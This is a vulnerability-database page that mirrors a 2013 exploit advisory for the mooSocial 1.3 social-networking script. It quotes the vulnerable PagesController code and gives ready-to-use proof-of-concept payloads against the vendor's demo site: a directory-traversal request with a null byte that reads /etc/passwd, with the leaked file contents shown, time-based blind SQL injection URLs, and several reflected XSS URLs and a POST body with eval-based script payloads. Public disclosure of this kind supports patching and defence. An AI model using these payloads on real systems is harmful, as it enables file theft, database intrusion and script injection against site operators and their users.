Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

mooSocial 1.3 Cross Site Scripting / Local File Inclusion

🗓️ 23 Aug 2013 00:00:00Reported by EsacType 
packetstorm
 packetstorm🔗 packetstormsecurity.com👁 26 Views

mooSocial 1.3 Multiple Vulnerabilities CakePHP Directory Traversal LF

Code
`###########################################################################################  
#Exploit Title: mooSocial 1.3 - Multiple Vulnerabilites  
#Official site: http://www.moosocial.com  
#Risk Level: High  
#Demo : http://demo.moosocial.com  
#Exploit Author: Esac  
#Homepage author : www.iss4m.ma  
#Last Checked: 22/08/2013  
###########################################################################################  
  
  
+----------+  
| OVERVIEW |  
+----------+  
  
mooSocial is a social networking script built on top of CakePHP 2 framework. It has all the features to build a successful community (e.g. blog, photo, group, event, video, topic...).  
  
mooSocial is a premium version {  
  
Standard Version : $149  
Developer Version : $449  
  
}  
  
+-----------------------------------------------------------------------------------+  
  
+----------------------------+  
| Directorty Traversal / LFI |  
+----------------------------+  
  
mooSocial is vulnerable to a directory traversal / local file inclusion vulnerability , as a result, it was possible for an attacker to load webserver-readable files from the local filesystem (and to execute PHP stored on the server).  
  
  
  
+--------------------+  
| How did it work? |  
+--------------------+  
  
In the PHP code for de mooSocial website, there’s a controller called PagesController.php that is used to load static / semi-static pages. The exact name of the page to be loaded is determined by the query string: for example, http://www.demo.moosocial.com/pages/chat loads the Site chat page, which is stored as a template in the system.   
  
i used Burp suite tool to intercept data cuz there is redirection here when we put something else after the root path  
  
vuln code :  
  
...................  
  
class PagesController extends AppController   
{  
  
public function display()   
{  
$path = func_get_args();  
  
$count = count($path);  
if (!$count) {  
$this->redirect('/');  
}  
$page = $subpage = $title_for_layout = null;  
  
if (!empty($path[0])) {  
$page = $path[0];  
}  
if (!empty($path[1])) {  
$subpage = $path[1];  
}  
if (!empty($path[$count - 1])) {  
$title_for_layout = Inflector::humanize($path[$count - 1]);  
}  
$this->set(compact('page', 'subpage', 'title_for_layout'));  
  
// check if site is offline  
$moo_setting = $this->_getSettings();  
$uid = $this->Session->read('uid');   
  
if ( !empty( $moo_setting['site_offline'] ) && !is_root_admin( $uid ) )  
{  
$this->layout = '';  
$this->set('offline_message', $moo_setting['offline_message']);  
$this->render('/Elements/misc/offline');  
}  
else  
$this->render(implode('/', $path));  
}  
}  
  
  
This code is vulnerable to a directory traversal attack: the $path, which is used to load a template, is directly tied to user input (the arguments to the function here are the elements of the query string). By sending URL slashes (/), it was possible to break out of the current directory and traverse via a relative path to any directory in the system. It was also possible to convince CakePHP (the framework used here) to load files without the ctp file extension associated with templates by including a URL null byte (%00) at the end of the URL.  
  
  
  
+------------------+  
| PROOF OF CONCEPT |  
+------------------+  
  
http://demo.moosocial.com/pages/../../../../../../../../../../etc/passwd%00  
  
Requet Headers :  
  
GET /pages/../../../../../../../../../../etc/passwd%00 HTTP/1.1  
Host: demo.moosocial.com  
Accept: */*  
Accept-Language: en  
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)  
Connection: close  
  
  
Response Headers :  
  
HTTP/1.1 404 Not Found  
Date: Thu, 22 Aug 2013 04:56:29 GMT  
Server: Apache  
Set-Cookie: CAKEPHP=r7t684gq0po1spmqpp5634p2l3; expires=Thu, 22-Aug-2013 05:26:29 GMT; path=/  
Content-Length: 37338  
Vary: Accept-Encoding  
Connection: close  
Content-Type: text/html; charset=UTF-8  
  
  
Response Raw :  
  
//source code of the page   
  
.........................  
  
root:x:0:0::/ramdisk/root:/ramdisk/bin/bash  
bin:x:1:1:bin:/bin:/sbin/nologin  
daemon:x:2:2:daemon:/sbin:/sbin/nologin  
adm:x:3:4:adm:/var/adm:/sbin/nologin  
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin  
sync:x:5:0:sync:/sbin:/bin/sync  
  
........................  
  
  
+--------------------------------+  
| Time-Based Blind Injection |  
+--------------------------------+  
  
  
http://demo.moosocial.com/blogs/view/{Inject here}  
  
  
Real exploitation :  
  
http://demo.moosocial.com/blogs/view/1 and sleep(2)  
  
==> will pause for 2 seconds and diplay the page after  
  
http://demo.moosocial.com/blogs/view/1 and sleep(10)  
==> will pause for 10 seconds and diplay the page after  
  
+-----+  
| XSS |  
+-----+  
  
//all XSS tested on Mozila Firefox  
  
  
http://demo.moosocial.com/tags/view/"><img src="a" onerror='eval(atob("cHJvbXB0KDEpOw=="))'  
  
http://demo.moosocial.com/albums/ajax_browse/"><img src="a" onerror='eval(atob("cHJvbXB0KDEpOw=="))'  
  
  
http://demo.moosocial.com/blogs/ajax_browse/"><img src="a" onerror='eval(atob("cHJvbXB0KDEpOw=="))'  
  
  
http://demo.moosocial.com/topics/ajax_browse/"><img src="a" onerror='eval(atob("cHJvbXB0KDEpOw=="))'  
  
  
http://demo.moosocial.com/groups/ajax_browse/"><img src="a" onerror='eval(atob("cHJvbXB0KDEpOw=="))'  
  
  
http://demo.moosocial.com/videos/ajax_browse/"><img src="a" onerror='eval(atob("cHJvbXB0KDEpOw=="))'  
  
//The input is reflected inside <script> tag between single quotes  
  
http://demo.moosocial.com/groups/view/10/video_id:'';!--'<XSS>=&{()}  
http://demo.moosocial.com/groups/view/10/topic_id:'';!--'<XSS>=&{()}  
  
  
  
XSS via Post method :  
  
POST /videos/ajax_embed HTTP/1.1  
Content-Length: 75  
Content-Type: application/x-www-form-urlencoded  
Cookie: CAKEPHP=u3e5q7ut90nhcg7ao1e9c8tni4; mooSocial[language]=Q2FrZQ%3D%3D.9%2F79; mooSocial[theme]=Q2FrZQ%3D%3D.%2FvHjC2hN; mooSocial[activity_feed]=Q2FrZQ%3D%3D.9%2Bb%2FFmVNBY8%3D  
Host: demo.moosocial.com  
Connection: Keep-alive  
Accept-Encoding: gzip,deflate  
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)  
Accept: */*  
  
source=youtube&source_id=" onmouseover=prompt(976681) bad="  
  
  
  
+--------------------------------------------------------------------------------------+  
  
Knowledge is not an Object , it's a flaw :)  
Greetz : White Tarbouch TEAM - Cobra   
WwW.Iss4m.Ma  
./Issam IEBOUBEN Aka Esac  
  
  
  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
23 Aug 2013 00:00Current
0.3Low risk
Vulners AI Score0.3
moosocialvulnerabilitycakephpdirectory traversallocal file inclusionlfi
26